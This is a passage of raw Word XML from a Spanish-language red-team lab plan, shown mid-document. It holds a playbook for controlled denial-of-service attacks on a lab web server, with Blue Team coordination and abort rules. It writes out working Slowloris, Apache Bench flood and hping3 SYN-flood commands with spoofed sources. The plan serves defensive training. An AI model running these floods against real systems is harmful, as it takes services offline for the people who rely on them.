      </w:r>
      <w:r>
        <w:t xml:space="preserve">si se compromete el servidor, escanear desde adentro la red interna.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Exfiltración simbólica: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">copiar un archivo "sensible" del laboratorio como prueba de impacto. Nunca datos reales.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8. Playbook — Denegación de servicio controlada</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Este playbook define la ejecución de la fase de DoS. La intención no es destruir el servicio, sino demostrar el vector, medir el impacto y darle al Blue Team la oportunidad de detectar y responder. Se ejecuta en una ventana acordada con el equipo defensor.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EDA" w:sz="1"/>
              <w:left w:val="single" w:color="633806" w:sz="18"/>
              <w:bottom w:val="single" w:color="FAEEDA" w:sz="1"/>
              <w:right w:val="single" w:color="FAEEDA" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FAEEDA" w:color="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="160"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="160"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="633806"/>
              </w:rPr>
              <w:t xml:space="preserve">Reglas no negociables</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="633806"/>
              </w:rPr>
              <w:t xml:space="preserve">Duración máxima por ataque: 60–120 segundos. Sólo dentro de lab-net. El Blue Team debe estar avisado y monitoreando. Si el servidor deja de responder por más de 3 minutos, abortar y notificar.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.1 Objetivos de la fase</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Demostrar al menos dos vectores distintos de DoS sobre el servicio HTTP del objetivo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Medir el impacto en términos de latencia, errores HTTP y disponibilidad.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Generar evidencia que sirva tanto al informe del Red Team como al del Blue Team.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Validar que el Blue Team puede detectar el ataque a través de sus logs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.2 Preparación</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Antes de iniciar cualquier ataque, el equipo prepara la línea base de medición. Sin línea base, los datos del impacto no significan nada.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Línea base de latencia (antes del ataque)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Desde el contenedor Kali, medir latencia base al servicio</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ab -n 100 -c 5 http://172.20.0.20/ &gt; /root/loot/baseline_ab.txt 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># También capturar tiempo de respuesta de un GET simple, 10 muestras</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">for i in {1..10}; do</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  curl -s -o /dev/null -w "%{time_total}\n" http://172.20.0.20/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="160" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">done | tee /root/loot/baseline_curl.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Coordinación con el Blue Team</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mensaje formal: "Vamos a iniciar la ventana de DoS en X minutos sobre el puerto 80."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Confirmar que el Blue Team está monitoreando logs y métricas del servidor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Acordar la señal de aborto (por ejemplo, mensaje en el canal del equipo).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.3 Vectores de ataque</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Se ejecutan los vectores en orden creciente de intensidad. Después de cada uno, se hace una pausa de al menos 5 minutos para que el servicio se recupere y el Blue Team pueda revisar logs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vector 1 — Slowloris (HTTP, capa de aplicación)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mantiene cientos de conexiones HTTP abiertas a medio completar, agotando los workers del servidor web. Es el ataque más "elegante": consume pocos recursos del atacante y es difícil de distinguir de tráfico legítimo lento.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Instalación si no está presente</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">apt install -y slowhttptest</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Slow loris contra el servicio HTTP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">slowhttptest -c 500 -H -i 10 -r 200 -t GET \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  -u http://172.20.0.20/ -x 24 -p 3 \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  -g -o /root/loot/slowloris_report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="160" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Duración: 60 segundos máximo. Detener con Ctrl+C antes de los 90 s.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Parámetros relevantes: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">-c 500</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (conexiones), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">-i 10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (intervalo de seguimiento), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">-r 200</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (tasa de creación), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">-g</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (genera reporte HTML/CSV automáticamente).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vector 2 — HTTP flood con Apache Bench</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Inunda el servicio con peticiones legítimas concurrentes. Sirve para medir cuándo el servidor empieza a devolver errores 5xx o a aumentar latencia.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># 50,000 peticiones, 1,000 concurrentes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ab -n 50000 -c 1000 http://172.20.0.20/ \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  &gt; /root/loot/http_flood_ab.txt 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Si el servicio aguanta, subir la concurrencia gradualmente</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ab -n 100000 -c 2000 http://172.20.0.20/ \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="160" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  &gt; /root/loot/http_flood_2k.txt 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vector 3 — SYN flood con hping3 (capa de transporte)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Satura la tabla de conexiones TCP del servidor enviando paquetes SYN sin completar el handshake. Requiere </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">NET_RAW</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> en el contenedor Kali.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># SYN flood contra puerto 80, fuente aleatorizada</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">hping3 -S --flood --rand-source -p 80 172.20.0.20</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Detener con Ctrl+C después de 30-60 segundos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="160" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># IMPORTANTE: este ataque puede saturar también la red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EDFE" w:sz="1"/>
              <w:left w:val="single" w:color="534AB7" w:sz="18"/>
              <w:bottom w:val="single" w:color="EEEDFE" w:sz="1"/>
              <w:right w:val="single" w:color="EEEDFE" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="EEEDFE" w:color="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="160"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="160"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="534AB7"/>
              </w:rPr>
              <w:t xml:space="preserve">Por qué este orden</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="534AB7"/>
              </w:rPr>
              <w:t xml:space="preserve">Slowloris primero (silencioso, mide capacidad del servidor). Luego HTTP flood (alto volumen pero tráfico válido). SYN flood al final, porque es el más disruptivo y puede afectar también a la red Docker, contaminando otras mediciones.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
      </w:pPr>
